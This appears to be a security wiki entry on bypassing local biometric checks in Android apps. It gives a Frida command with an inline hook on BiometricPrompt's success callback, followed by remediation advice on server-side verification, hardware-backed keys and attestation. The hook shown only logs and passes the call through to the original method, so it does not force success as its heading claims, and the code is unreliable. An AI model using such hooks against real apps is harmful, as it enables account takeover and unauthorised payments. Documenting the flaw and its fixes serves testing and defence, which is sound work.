Biometric Bypass

Description

If critical operations rely only on local biometric success (fingerprint/Face ID) without server verification or device attestation, attackers can hook the biometric API and force success to unlock features or authorize payments.

Examples

Force Biometric Success With Frida (Android)

frida -U -f com.example.app -l - --no-pause <<'JS'
Java.perform(function () {
  var CB = Java.use('androidx.biometric.BiometricPrompt$AuthenticationCallback');
  CB.onAuthenticationSucceeded.implementation = function () {
    console.log('Forcing biometric success');
    return this.onAuthenticationSucceeded.apply(this, arguments);
  };
});
JS

If server accepts privileged actions solely based on client state, the bypass is effective.

Remediation

Server‑side authorization
- Treat local biometric as a UX convenience; verify authorization server‑side with signed challenges.
Proof‑of‑possession
- Bind operations to hardware‑backed keys and require per‑action signatures.
Attestation and risk checks
- Enforce device integrity (Play Integrity/App Attest) and step‑up auth on suspicious signals.

Haxoris Wiki

Biometric Bypass

Description

Examples

Force Biometric Success With Frida (Android)

Remediation